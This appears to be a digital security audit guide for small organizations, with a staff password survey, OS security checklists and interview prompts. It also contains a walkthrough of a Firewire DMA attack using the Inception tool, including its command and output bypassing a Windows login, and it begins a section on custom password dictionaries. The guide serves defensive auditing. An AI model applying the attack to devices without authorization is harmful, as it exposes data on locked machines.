How many passwords do you have to remember for accounts and devices used to do your work?

If you tried to login to your computer account right now, how many attempts do you think it would take?

Have you written down your current password?

• [ ] No
• [ ] Yes, on paper
• [ ] Yes, electronically (stored in a document or spreadsheet in my computer, phone, etc.)
• [ ] Yes, in a password manager
• [ ] Other

If you wrote down your current password, how is it protected (choose all that apply) ?

• [ ] I do not protect it
• [ ] I stored it in an encrypted file
• [ ] I hid it
• [ ] I stored it on a computer or device protected with another password
• [ ] I locked up the paper
• [ ] I always keep the password with me
• [ ] I wrote down a reminder instead of the actual password
• [ ] Other

Have you ever forgotten your current password?

• [ ] No
• [ ] Yes

If yes, how did you recover it?

Have you ever forgotten old work passwords?

• [ ] No
• [ ] Yes

If yes, how did you recover it?

When you created your current password, which of the following did you do?

• [ ] I reused an old password
• [ ] I modified an old password
• [ ] I have a list of passwords which I rotate through
• [ ] I reused a password I was already using for a different account
• [ ] I created an entirely new password
• [ ] Other:

Do you have a set of passwords you reuse in different places?

• [ ] No
• [ ] Yes

Do you have a password that you use for different accounts with a slight modification for each account?

• [ ] No
• [ ] Yes

Did you use any of the following strategies to create your current password (choose all that apply) ?

• [ ] Password based on the first letter of each word in a phrase
• [ ] Based on the name of someone or something
• [ ] Based on a word or name with numbers / symbols added to beginning or end
• [ ] Based on a word or name with numbers and symbols substituting for some of the letters ( e.g. '@' instead of 'a')
• [ ] Based on a word or name with letters missing
• [ ] Based on a word in a language other than English
• [ ] Based on a phone number
• [ ] Based on an address
• [ ] Based on a birthday

How long is your current password (total number of characters)?

• [ ] I prefer not to answer.

What symbols (characters other than letters and numbers) are in your password?

• [ ] I prefer not to answer.

How many lower-case letters are in your current password?

• [ ] I prefer not to answer.

How many upper-case letters are in your current password?

• [ ] I prefer not to answer.

In which positions in your password are the numbers?

• [ ] First
• [ ] Second
• [ ] Second from last
• [ ] Last
• [ ] No Numbers
• [ ] I prefer not to answer.

How many symbols are in your current password?

In which positions in your password are the symbols?

• [ ] First
• [ ] Second
• [ ] Second from last
• [ ] Last
• [ ] No Numbers
• [ ] I prefer not to answer.

Recommendation

Recommendation: Adopt Stronger Passwords

Any important password should be long enough and complex enough to prevent both standard dictionary attacks and “brute-force attacks” in which clusters of powerful computers work in parallel to test every possible character combination. (We recommend 12 or more completely random characters or a passphrase that contains five or more relatively uncommon words.) The key should not contain common “phrases,” expecially from well known literature like Shakespeare or religious texts, but also should not include number sequences or phrases, especially if they are related to the organization, its employees or its work, and to use unique passwords for each account.

Because this becomes logistically difficult, password managers such as KeePassX or other systems are recommended.

Specifically for wireless passwords, choosing a strong WPA key is one of the most important steps toward defending an organization’s network perimeter from an adversary with the ability to spend some time in the vicinity of the offices. By extension, mitigating this vulnerability is critical to the protection of employees and partners (and confidential data) from the sort of persistent exposure that eventually brings down even the most well-secured information systems.

Because shared keys inevitably end up being written on whiteboards, given to office visitors and emailed to partners, the WPA key should also be changed periodically. This does not have to happen frequently, but anything less than three or four times per year may be unsafe.

As WPA3 becomes more widely adopted, upgrading your network to WPA3 authentication will provide substantial security against wireless password attacks.

A Day in the Life

Covered in full in User Device Assessment:

• Integrated with other activities/interactions, interview staff on their usage of technology and remote services

A Night in the Life

Covered in full in User Device Assessment:

• Integrated with other activities/interactions, interview staff on their usage of technology and remote services outside of work

Assessing Usage of Cloud Services

Covered in full in Data Assessment:

• Review organization's use of cloud services (which services, what data, access policies)
• Review formal policies of cloud services in use
• Search for historical security problems with each provider and their response to it.

Network Mapping

Covered in full in Network Mapping

• Confirm what devices and servers are in scope of the audit, and confirm that any service providers (website hosts, cloud hosts, etc.) are informed and OK with any scanning to be conducted.
• Enumerate and categorize all devices connected to the organization's network. Note that this could include IoT (Internet of Things) devices, such as IP cameras used for security, "Smart" devices, and personal devices such as mobile phones which may not be in scope. Discuss the scope of the audit as it applied to devices connected to the work network and ensure the staff understand what you are doing.
• In some cases, the audit scope may include external devices. The scanning in these cases will be very targeted. If your auditee agreed to have their public facing machines scanned, keep in mind that you need to consider asking your auditee for whitelisting options for shunning IDS/IPS, firewalls and other blocking mechanisms during your scan. Also make sure that you have verified the target in-scope. This is to avoid scanning out-of-scope targets that may lead you to other problems.
• Categorize and gather additional detail on the devices that you will discover
• Explore potential vulnerabilities, unexpected devices, and suspicious open ports

Physical Security Guided Tour

Covered in full in Physical Assessment:

Have your point of contact walk you around the office (often as part of introductions on the first day) - mentally note physical security concerns. Document how difficult it would be for a visitor or after-hours break-in to access sensitive systems. Identify physical assets with sensitive content, such as:

• Networking equipment and servers
• User devices (workstations/laptops, smarthpones, USB drives)
• Sensitive information or external storage drives lying on desks
• Accounts/passwords written on post-its, white-boards, etc.
• Unattended, logged in computers
• Unlocked cabinets, computer rooms, or wiring closets
• Network ports that are not in use, especially ones not in plain sight

This can be done remotely via secure videoconference over a smartphone or tablet that can moved around the office easily.

Combining this activity with Office Mapping helps to reduce the awkwardness of taking notes while walking around the office, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each.

Device and Behaviour Assessment

Summary

The auditor checks staff devices for updated systems and software, anti-virus and other security capabilities, and identifies software running on computers and its current version. The auditor checks for known vulnerabilities to any out of date software.

This is used to develop a report component exposing how un-updated software can lead to large vulnerabilities.

Overview

• Identify what privilege level services are running under -- Are users using accounts with admin privileges, or are they using another user and have to type in a password to get admin rights? ⁵⁶
• Check for existence and status of anti-virus (and anti-malware tools) on the device. ⁵⁷
• Record the version and patch levels of software on the device. ⁵⁸
• Identify what level of encryption is being used and is available for data storage on the device. ⁵⁹
• Using the list of software versions and patches identify attacks and, if possible, identified malware that devices in the office are vulnerable to.

Materials Needed

• A notepad may be useful

Considerations

• Communicate with the staff members the level of confidentiality you are treating discussions around their device and technology usage with - i.e. explain what incident response triggers you have agreed upon with the organization, and that anything not triggering that is to be only reported in aggregate.

Walkthrough

The auditor inspects a subset of key and/or representative user devices (work & personal). The auditor should focus on the work devices to limit scope creep, but if the office has many personal devices accessing organizational accounts/data, the auditor should share what "red flags" they are looking for and work in tandem with device owners and/or IT staff. For a small office, it may be possible to check every machine. For larger offices, the auditor should use a subset to get a feel for the overall security stance of user devices.

As you work with staff members, also interview them about the other devices they use such as phones and tablets, and how they connect to work services - email/webmail, chat Apps, intra/extranet tools, Constituent Relationship Management (CRM) tools like CiviCRM or Salesforce, financial tracking tools, and website management tools.

Below is a checklist to assist in checking across different platforms/versions for common security needs.

OSX

• OS Security Updates

• Firewall
  • See http://support.apple.com/en-us/HT1810 for cross-version guidance
  • (GUI) Choose System Preferences from the Apple menu, Security (10.5 and before) or Security & Privacy (10.6 and later), then the Firewall tab.
• Anti-Virus Version
• User privilege
• Drive Encryption
• 151. sudo fdesetup status
• (GUI) Choose System Preferences from the Apple menu, Security (10.5 and before) or Security & Privacy (10.6 and later), then the FileVault tab.
• (VeraCrypt)
• Services Running
• (Command line) sudo launchctl list
• (Command line) ps -ef

• (GUI) The "Activity Monitor" application is located in /Applications/Utilities provides a similar interface to "top"

Windows

If Windows is not your primary OS, you can download sample Virtual Machines (with time limitations) from Microsoft through their project to improve IE support via https://www.modern.ie/en-us/virtualization-tools#downloads (see also http://www.makeuseof.com/tag/download-windows-xp-for-free-and-legally-straight-from-microsoft-si/ and https://modernievirt.blob.core.windows.net/vhd/virtualmachine_instructions_2014-01-21.pdf)

Windows 10

• OS Security Updates
• Start --Settings --Update & Security --Windows Update
• Firewall
• Start, type Firewall (select Windows Firewall)
• Privacy
• Start --Settings -- Privacy
• Anti-Virus Version
• Privacy
• (GUI) Start --Settings -- Privacy
• User privilege
• Start, type 'User Account', select "Change User Account Control settings"
• Drive Encryption
• (Bitlocker), https://docs.microsoft.com/en-us/windows/device-security/bitlocker/bitlocker-device-encryption-overview-windows-10
• Services Running
• Start, type "Task Manager"

Windows 8

• OS Security Updates
• Firewall
• (GUI) Start (or Down Arrow Icon, PC Settings) -- Control Panel -- Windows Firewall
• 151. Netsh Advfirewall show allprofiles
• (more detail: http://windows.microsoft.com/en-us/windows-8/windows-firewall-from-start-to-finish)
• Anti-Virus Version
• User privilege
• Drive Encryption
• https://diskcryptor.net/wiki/Main_Page
• Services Running
• Right-Click on bottom taskbar, select "Task Manager"

Installed updates

Control Panel Programs and features installed updates CLI: http://www.techsupportalert.com/en/quick-and-easy-way-list-all-windows-updates-installed-your-system.htm

Windows 7

In Windows 7, (GUI) Control Panel -- All Control Panel Items -- Action Center (Security tab) provides a quick run-down of most security features installed and their update status. It does not show drive encryption or specific versions.

• OS Security Updates
• Firewall
• (GUI) Control Panel -- All Control Panel Items -- Windows Firewall
• 151. Netsh Advfirewall show allprofiles
• Anti-Virus Version
• User privilege
• (GUI) Control Panel -- All Control Panel Items -- User Accounts and checking also the User Account Control settings.
• Drive Encryption
• (GUI) Control Panel -- All Control Panel Items -- BitLocker Drive Encryption
• (VeraCrypt) , https://diskcryptor.net/wiki/Main_Page
• Services Running
• 151. tasklist
• (GUI) Right-click on task bar, select "Start Task Manager"
• (Advanced) Use TechNet/SysInternal's Process Explorer: http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx

Windows XP

If user is still operating on windows XP, recommendation is to upgrade to later windows. Windows XP is no longer supported and is not receiving security updates: https://www.microsoft.com/windows/en-us/xp/end-of-xp-support.aspx

If there is an organizationally critical system relying on Windows XP, removing it from the network and carefully managing data exchange with it may provide a bridge solution until a replacement process can be funded and rolled out.

Linux

• Firewall
• 151. sudo iptables -L -n
• 151. (Ubuntu, and only if installed) sudo ufw status
• (GUI) (Ubuntu, and only if installed) gufw
• Anti-Virus Version
• 151. deb: dpkg-query -l | grep virus rpm: yum list installed | grep virus
• See also: https://en.wikipedia.org/wiki/Linux_malware#Anti-virus_applications
• User privilege
• 151. groups
• Drive Encryption
• (VeraCrypt)
• Services Running
• 151. ps -ef
• 151. top

Recommendation

If Unsupported Operating System - Upgrade to Recent Version

Popular operating systems like Windows XP are, sadly, no longer receiving security updates. Upgrade to the latest version keeping in mind the system requirements of the version selected. For Windows, review the Windows lifecycle fact sheet for upcoming "EOLs" (End of Life). Apple does not publish EOL schedules, but historically releases security updates for their current and two prior releases.

While "pirated" operating systems and software are extremely common (especially for Windows) they often leave much to be desired in terms of security. If the OS or Software is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or recommended Free Open Source Software

If Pirated Software - Move to Licensed Software Systems

While "pirated" operating systems and software are extremely common (especially for Windows) they often leave much to be desired in terms of security. If the OS or Software is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or recommended Free Open Source Software

If Outdated - Update Operating Systems and Other Software

Operating Systems and Softwares of all varieties - Windows, Mac, Linux, and others, are constantly being updated. These updates often fix bugs, but they also protect the system from newly discovered vulnerabilities. It can seem difficult to keep updating constantly, but this is very important to protect even non-sensitive systems.

If Vulnerable Software - Update Vulnerable Software

Many critical software components, such as Java or Adobe Flash, have many vulnerabilities and need to be aggressively updated. If there are not needed for work by the users, uninstall them

If No Anti-Virus and Anti-Malware Scanner - Install Anti-Virus and Anti-Maware Scanner

An Anti-virus and Anti-malware offer some minimal protection to the system and therefore is important to have them installed.

If Outdated Anti-Virus - Update Anti-Virus

Most AV tools automatically update, but this can sometimes get out of sync, or if the AV was a pre-installed trial system, it will stop updating after its trial period. An out of date anti-virus is worthless. Therefore ensure that continuous udpdating of AV is done.

If Unencrypted Drive - Encrypt Hard Drives

When possible, build-in drive encryption (Filevault on OSX, BitLockeron Windows, and LUKS on Linux) tend to offer the most seamless, user-friendly experiences. VeraCrypt offers free cross-platform drive encryption and cna also create encrypted drives which can be shared across platforms.

If Inactive firewall - Activate both personal and server firewall (If present)

Again, where present, use built-in firewalls and configure them for both office and public network options. Testing to ensure systems can still perform expected office natworking (file sharing, printing, etc.) is essential unless alternatives are created.

Mobile Device Assessment

Summary

The auditor checks for the type of mobile devices in the organizations Follows a series of steps depending on the different mobile devices.

The key considerations with regards to mobile devices are the user, the type of device, and the data it manages. - the data is kept secure; - device is configured with the recommended security settings; - the organizational policies and procedures with regards to mobile devices; - In case of organization owned devices, that management has control over its facilitates.

These considerations contribute to the development of the report component.

Overview

• Identify what mobile devices are in the organization. Are they organizational owned or personal?
• Decide the scope of the mobile device assessment (ie will it cover personal devices or only organizational resources; number of devices)
• Check for existence and status of any policies and procedures (formal or informal)
• Identify the control measures in place and responsibility levels.

Materials Needed

• A notepad, pen. Also an already prepared list of different kinds of mobile devices

Considerations

• Communicate clearly to the staff members the level of access needed for the audit and obtain their consent in case personal devices are being checked i.e. explain that it may involve access of private data on their personal devices.

NB: The auditor should not access any personal mobile device absence of the owner of the device and any step taken should be explained before being implemented.

Walkthrough

The auditor confirms the number and nature of mobile devices that the organization owns. The auditor should keep within the agreed scope. But in the case where multiple mobile devices outside the agreed scope access the organizations' resources, then redefining of the scope may be necessary. Auditor should also consider the instructions under the device checklist.

As you work with staff members, also remember to interview them about the devices they use. This can alternate between mobile devices and non-mobile devices.

Below are some guiding questions to use. And this is an opportunity for the auditor to go deeper into any area concerning devices.

Guiding questions:

• What categories of mobile devices does the organization have? (eg, laptops, phones, external drives, cameras, recording devices, etc)

• What are they primarily used for?

• What data is stored on the devices and who has access to them

• Are the devices provided by organization or do staff use personal devices for official work? (Auditor: Review the props and cons of each set up)

• What are the risks involved with using each of the mobile devices? (NB: Auditor should know at least 2 risk for each of the devices in use)

• What is the impact of their use to the organization's work?

• Does the organization have specific policies and procedures concerning mobile devices? (eg; policy on use, encryption, location services, access control, password standards, etc)

• If yes; Do the policies and procedures define the access level to organizational devices and also for personal devices?

• What is the policy on using untrusted networks?

• What are the procedures for interacting with mobile systems which are not owned by the organization?

• What are the existing in/formal security practices for these devices? What are the physical security measures? What are the digital security measures?

• Which mobile phone OS are staff using? What are the props and cons of each?

• Is there someone in-charge of the devices and their security? (NB:Auditor: This checks on the capacity of the organization)

• What applications are installed? (Auditor note: check the device assessment checklist for the technical aspects)

• What are the users' perception towards the installed applications on their devices? (Auditor: Review the perception vs reality check findings)

• What security software if any are installed on the devices? Does it offer remote wipe functions?

• Are the users aware of them? (Exam the different categories separately)

• What is the financial implication of maintaining these devices?

Recommendation

A Day in the Life

Summary

The auditor checks staff devices for updated systems and software, anti-virus and other security capabilities, and identifies software runing on computers and its current version. The auditor checks for known vulnerabilities to any out of date software.

This is used to develop a report component exposing how un-updated software can lead to large vulnerabilities.

Overview

• Integrated with other activities/interactions, interview staff on their usage of technology and remote services

Materials Needed

Considerations

• Communicate with the staff members the level of confidentiality you are treating discussions around their device and technology usage with - i.e. explain what incident response triggers you have agreed upon with the organization, and that anything not triggering that is to be only reported in aggregate.

• If using screen sharing, use a service with transport security and "lock" the room or make sure the user knows to end the call if anyone unexpected joins the room (unlikely)

Walkthrough

As you work with staff members (this pairs well with the device checklist activity), also interview them about the other devices they use, and how they connect to work services - email/webmail, intra/extranet tools, Constituent Relationship Management (CRM) tools like CiviCRM or Salesforce, financial tracking tools, and website management tools.

This can also be done remotely. Ask to have the staff member use a screensharing tool (meet.jit.si or appear.in offer easy-to-use, browser based options) so that you can watch how they interact with their computer and what applications are active in the background.

Phone Usage

• Work Email
• Work Calls
• Chat Apps with partners/work related

User Software and Tools

• Email software
• Calendars
• Shared Files inside the office
• Other shared file systems
• Chat
• Voice calls
• Program tracking software
• Financial
• Progress
• Databases
• intranet
• extranet / other sites?

Remote Services

• Dropbox / Google Drive
• Work Email
• Websites and blogs
• Social media
• Online CRM or mass-mailing tools (SalesForce, CiviCRM, MailChimp...)

Recommendation

If Unsupported Operating System - Upgrade to Recent Version

Popular operating systems like Windows XP are, sadly, no longer receiving security updates. Upgrade to the latest version keeping in mind the system requirements of the version selected. For Windows, review the Windows lifecycle fact sheet for upcoming "EOLs" (End of Life). Apple does not publish EOL schedules, but historically releases security updates for their current and two prior releases.

While "pirated" operating systems and software are extremely common (especially for Windows) they often leave much to be desired in terms of security. If the OS or Software is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or recommended Free Open Source Software

If Pirated Software - Move to Licensed Software Systems

While "pirated" operating systems and software are extremely common (especially for Windows) they often leave much to be desired in terms of security. If the OS or Software is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or recommended Free Open Source Software

If Outdated - Update Operating Systems and Other Software

Operating Systems and Softwares of all varieties - Windows, Mac, Linux, and others, are constantly being updated. These updates often fix bugs, but they also protect the system from newly discovered vulnerabilities. It can seem difficult to keep updating constantly, but this is very important to protect even non-sensitive systems.

If Vulnerable Software - Update Vulnerable Software

Many critical software components, such as Java or Adobe Flash, have many vulnerabilities and need to be aggressively updated. If there are not needed for work by the users, uninstall them

If No Anti-Virus and Anti-Malware Scanner - Install Anti-Virus and Anti-Maware Scanner

An Anti-virus and Anti-malware offer some minimal protection to the system and therefore is important to have them installed.

If Outdated Anti-Virus - Update Anti-Virus

Most AV tools automatically update, but this can sometimes get out of sync, or if the AV was a pre-installed trial system, it will stop updating after its trial period. An out of date anti-virus is worthless. Therefore ensure that continuous udpdating of AV is done.

If Unencrypted Drive - Encrypt Hard Drives

When possible, build-in drive encryption (Filevault on OSX, BitLockeron Windows, and LUKS on Linux) tend to offer the most seamless, user-friendly experiences. VeraCrypt offers free cross-platform drive encryption and cna also create encrypted drives which can be shared across platforms.

If Inactive firewall - Activate both personal and server firewall (If present)

Again, where present, use built-in firewalls and configure them for both office and public network options. Testing to ensure systems can still perform expected office natworking (file sharing, printing, etc.) is essential unless alternatives are created.

A Night in the Life

Summary

The auditor interviews the staff about their practices, personal devices, software and other security capabilities that they use outside of work. The auditor checks for known vulnerabilities to any out of date software and identifies risks in the practices and behaviors.

This is used to develop a report component exposing how practices outside of their work can affect their personal security and that of the organization.

Overview

• Integrated with other activities/interactions, interview staff on their usage of technology and remote services outside of work

Considerations

• Communicate with the staff members the level of confidentiality you are treating discussions around their device and technology usage with - i.e. explain what incident response triggers you have agreed upon with the organization, and that anything not triggering that is to be only reported in aggregate.

• If using screen sharing, use a service with transport security and "lock" the room or make sure the user knows to end the call if anyone unexpected joins the room (unlikely)

Walkthrough

As you work with staff members (this pairs well with the device checklist activity and a day in the life), also interview them about the other devices they use, and how they connect to work or personal services - email/webmail, intra/extranet tools, Constituent Relationship Management (CRM) tools like CiviCRM or Salesforce, financial tracking tools, social media, and website management tools.

This can also be done remotely. Ask to have the staff member use a screensharing tool (meet.jit.si or appear.in offer easy-to-use, browser based options) so that you can watch how they interact with their computer and what applications are active in the background.

Phone Usage

• Work or Personal Email
• Work or Personal Calls
• Chat Apps with partners/friends non-work related
• Social media apps

User Software and Tools

• Email software
• Calendars
• Other shared file systems
• Chat
• Voice calls
• General browser usage
• Program tracking software
• Financial
• Progress
• Databases
• intranet
• extranet / other sites?

Remote Services

• Dropbox / Google Drive
• Work Email
• Personal Email
• Websites and blogs
• Social media
• Online CRM or mass-mailing tools (SalesForce, CiviCRM, MailChimp...)

Personal Practices

• Office/home location
• Transportation means
• Physical security

Recommendation

If Unsupported Operating System - Upgrade to Recent Version

Popular operating systems like Windows XP are, sadly, no longer receiving security updates. Upgrade to the latest version keeping in mind the system requirements of the version selected. For Windows, review the Windows lifecycle fact sheet for upcoming "EOLs" (End of Life). Apple does not publish EOL schedules, but historically releases security updates for their current and two prior releases.

While "pirated" operating systems and software are extremely common (especially for Windows) they often leave much to be desired in terms of security. If the OS or Software is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or recommended Free Open Source Software

If Pirated Software - Move to Licensed Software Systems

While "pirated" operating systems and software are extremely common (especially for Windows) they often leave much to be desired in terms of security. If the OS or Software is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or recommended Free Open Source Software

If Outdated - Update Operating Systems and Other Software

Operating Systems and Softwares of all varieties - Windows, Mac, Linux, and others, are constantly being updated. These updates often fix bugs, but they also protect the system from newly discovered vulnerabilities. It can seem difficult to keep updating constantly, but this is very important to protect even non-sensitive systems.

If Vulnerable Software - Update Vulnerable Software

Many critical software components, such as Java or Adobe Flash, have many vulnerabilities and need to be aggressively updated. If there are not needed for work by the users, uninstall them

If No Anti-Virus and Anti-Malware Scanner - Install Anti-Virus and Anti-Maware Scanner

An Anti-virus and Anti-malware offer some minimal protection to the system and therefore is important to have them installed.

If Outdated Anti-Virus - Update Anti-Virus

Most AV tools automatically update, but this can sometimes get out of sync, or if the AV was a pre-installed trial system, it will stop updating after its trial period. An out of date anti-virus is worthless. Therefore ensure that continuous udpdating of AV is done.

If Unencrypted Drive - Encrypt Hard Drives

When possible, build-in drive encryption (Filevault on OSX, BitLockeron Windows, and LUKS on Linux) tend to offer the most seamless, user-friendly experiences. VeraCrypt offers free cross-platform drive encryption and cna also create encrypted drives which can be shared across platforms.

If Inactive firewall - Activate both personal and server firewall (If present)

Again, where present, use built-in firewalls and configure them for both office and public network options. Testing to ensure systems can still perform expected office natworking (file sharing, printing, etc.) is essential unless alternatives are created.

Multi Factor Authentication

When possible, enable multi factor authentication on work accounts (email, social media, website administration, etc). Specially if the accounts are being accessed with personal devices.

Firewire Access to Encrypted/Locked computers

Summary

Firewire ports and expansion slots can be abused to obtain data that are thought to be encrypted

Any attacker who obtains a running (including sleeping and hibernating!) Windows, Mac, or even Linux laptop with a Firewire port, an ExpressCard expansion slot, or a Thunderbolt port will be able to read, record or modify any sensitive information on the device, even if the screen is “locked” and the information is stored on an encrypted volume or in an encrypted folder. This applies to threats involving loss, theft and confiscation, but also to “checkpoint” scenarios in which the attacker may only have access for a few minutes.

This attack requires physical control of a machine that is not powered off. Full details of the scope of the attack are available at http://www.breaknenter.org/projects/inception/ .

Overview

Materials Needed

• A system with a firewire port, a thunderbolt port, or a PCMCIA slot and a firewire card. See http://www.breaknenter.org/projects/inception/#Requirements

Considerations

Walkthrough

Firewire ports and expansion slots can be abused to obtain data that are thought to be encrypted

The threat describe in this section is more complex than it needs to be. In fact, unencrypted data are vulnerable to any number of simple attacks, the two most straightforward being: 1) rebooting the computer from a USB stick CD-ROM or DVD containing an alternate operating system, then copying all of the data; or 2) removing the hard drive, inserting it into a different machine, then copying all of the data. These techniques, which work on nearly any computer, even if a strong login password has been set, are effective and widely used, but they require extended physical access to the device. A slightly different attack is described below, one that only requires physical access for a few minutes. It, too, works regardless of login/screen-lock passwords, though only devices with Firewire ports or expansion slots (ExpressCard, CardBus, PCMCIA, etc.) are vulnerable.

The steps required to defend against all of these threats is the same: encrypt your data using a tool like Microsoft’s BitLocker, Apple’s FileVaule or the open-source Truecrypt application. The Firewire attack highlighted here is particularly illustrative, however, because it serves as a reminder that merely setting up an encrypted volume is not enough. In much the same way that a lock does little to protect your home if the door to which it is attached remains open, data encryption is rarely effective while you are logged into your computer. Even if the screen is locked (which would foil the “reboot” and “hard drive removal” attacks described briefly above), an attacker may still find a way to access your sensitive data, while the computer is up and running, because the decryption key is present in the computer’s memory. (This is how large-scale encryption actually works. Information remains encrypted at all times, on the storage device where it lives, but you are able to access it while you are logged in, or while your encrypted volume is “open,” because your computer decrypts and encrypts it on the fly.) Walkthrough

Step 1: First, the attacker would connect her computer to the victim’s using a Firewire cable. Either or both machines could be using a true Firewire port or a Firewire expansion card. When a Firewire ExpressCard expansion card is inserted, Windows automatically installs and configures the necessary drivers, even if nobody is logged into the laptop.

Step 2: Once connected, the attacker simply runs the Inception tool, selects the operating system of the target machine and waits a minute or two for the attack to complete (depending on the amount of RAM present):

$ incept

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.2.0 (C) Carsten Maartmann-Moe 2012
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[*] FireWire devices on the bus (names may appear blank):
--------------------------------------------------------------------------------
[1] Vendor (ID): MICROSOFT CORP. (0x50f2) | Product (ID):  (0x0)
--------------------------------------------------------------------------------
[*] Only one device present, device auto-selected as target
[*] Selected device: MICROSOFT CORP.
[*] Available targets:
--------------------------------------------------------------------------------
[1] Windows 8: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu: libpam unlock/privilege escalation
--------------------------------------------------------------------------------
[!] Please select target (or enter 'q' to quit): 2
[*] Selected target: Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[*] Initializing bus and enabling SBP-2, please wait  1 seconds or press Ctrl+C
[*] DMA shields should be down by now. Attacking...
[*] Searching, 1328 MiB so far
[*] Signature found at 0x8b50c321 (in page # 570636)
[*] Write-back verified; patching successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

In the case of the laptops tested, Inception took approximately two minutes to reach the final, somewhat self-congratulatory line shown above. At that point, we were able to login using any password. (Entering “asdf” worked just fine, and gave us full access to all data on the computer.) Inception works by temporarily replacing authentication code using the Firewire’s protocol’s direct memory access (DMA). After a reboot, everything is restored to its original state.

Once again, it is worth noting that successful mitigation of this issue requires a combination of technology (data encryption) and some level of behavior change (shutting down laptops at the end of the day, when traveling and at any time when confiscation, theft, loss or tampering are particularly likely.)

Material that may be Useful:

Recommendation

Password Security Survey

Summary

Weak and "shared" passwords are prevalent - even after hundreds of well-publicized global password breaches, "password" and "12345" remain the most popular passwords, and password re-use is common. Weak wifi passwords are specifically a challenge, as wifi signals often are accessible outside of an office's physical limits, but provide full access to the private network.

Overview

• Using the password survey, determine the organization's baseline for password security

Materials Needed

• A prepared Password Survey (given sensitivity and need for anonymity, consider printing and then shredding/burning).
• The Level Up Activity, Password Reverse Race provides a staff activity.

Considerations

Walkthrough

Adapt this survey to get a sense of how passwords are used in the organization. Anonymous paper surveys, later destroyed, are a good way to gather this information. The earlier questions are more important in terms of getting a sense of password practices, so consider adapting or shortening the survey based on staff/leadership buy-in and risk considerations.

How many passwords do you have to remember for accounts and devices used to do your work?

If you tried to login to your computer account right now, how many attempts do you think it would take?

Have you written down your current password?

• [ ] No
• [ ] Yes, on paper
• [ ] Yes, electronically (stored in a document or spreadsheet in my computer, phone, etc.)
• [ ] Yes, in a password manager
• [ ] Other

If you wrote down your current password, how is it protected (choose all that apply) ?

• [ ] I do not protect it
• [ ] I stored it in an encrypted file
• [ ] I hid it
• [ ] I stored it on a computer or device protected with another password
• [ ] I locked up the paper
• [ ] I always keep the password with me
• [ ] I wrote down a reminder instead of the actual password
• [ ] Other

Have you ever forgotten your current password?

• [ ] No
• [ ] Yes

If yes, how did you recover it?

Have you ever forgotten old work passwords?

• [ ] No
• [ ] Yes

If yes, how did you recover it?

When you created your current password, which of the following did you do?

• [ ] I reused an old password
• [ ] I modified an old password
• [ ] I have a list of passwords which I rotate through
• [ ] I reused a password I was already using for a different account
• [ ] I created an entirely new password
• [ ] Other:

Do you have a set of passwords you reuse in different places?

• [ ] No
• [ ] Yes

Do you have a password that you use for different accounts with a slight modification for each account?

• [ ] No
• [ ] Yes

Did you use any of the following strategies to create your current password (choose all that apply) ?

• [ ] Password based on the first letter of each word in a phrase
• [ ] Based on the name of someone or something
• [ ] Based on a word or name with numbers / symbols added to beginning or end
• [ ] Based on a word or name with numbers and symbols substituting for some of the letters ( e.g. '@' instead of 'a')
• [ ] Based on a word or name with letters missing
• [ ] Based on a word in a language other than English
• [ ] Based on a phone number
• [ ] Based on an address
• [ ] Based on a birthday

How long is your current password (total number of characters)?

• [ ] I prefer not to answer.

What symbols (characters other than letters and numbers) are in your password?

• [ ] I prefer not to answer.

How many lower-case letters are in your current password?

• [ ] I prefer not to answer.

How many upper-case letters are in your current password?

• [ ] I prefer not to answer.

In which positions in your password are the numbers?

• [ ] First
• [ ] Second
• [ ] Second from last
• [ ] Last
• [ ] No Numbers
• [ ] I prefer not to answer.

How many symbols are in your current password?

In which positions in your password are the symbols?

• [ ] First
• [ ] Second
• [ ] Second from last
• [ ] Last
• [ ] No Numbers
• [ ] I prefer not to answer.

Recommendation

Recommendation: Adopt Stronger Passwords

Any important password should be long enough and complex enough to prevent both standard dictionary attacks and “brute-force attacks” in which clusters of powerful computers work in parallel to test every possible character combination. (We recommend 12 or more completely random characters or a passphrase that contains five or more relatively uncommon words.) The key should not contain common “phrases,” expecially from well known literature like Shakespeare or religious texts, but also should not include number sequences or phrases, especially if they are related to the organization, its employees or its work, and to use unique passwords for each account.

Because this becomes logistically difficult, password managers such as KeePassX or other systems are recommended.

Specifically for wireless passwords, choosing a strong WPA key is one of the most important steps toward defending an organization’s network perimeter from an adversary with the ability to spend some time in the vicinity of the offices. By extension, mitigating this vulnerability is critical to the protection of employees and partners (and confidential data) from the sort of persistent exposure that eventually brings down even the most well-secured information systems.

Because shared keys inevitably end up being written on whiteboards, given to office visitors and emailed to partners, the WPA key should also be changed periodically. This does not have to happen frequently, but anything less than three or four times per year may be unsafe.

As WPA3 becomes more widely adopted, upgrading your network to WPA3 authentication will provide substantial security against wireless password attacks.

Password Strength

Summary

This exercise supports the auditor in building an effective dictionary that is customized to an organization.

This dictionary can then be used in a variety of ways:

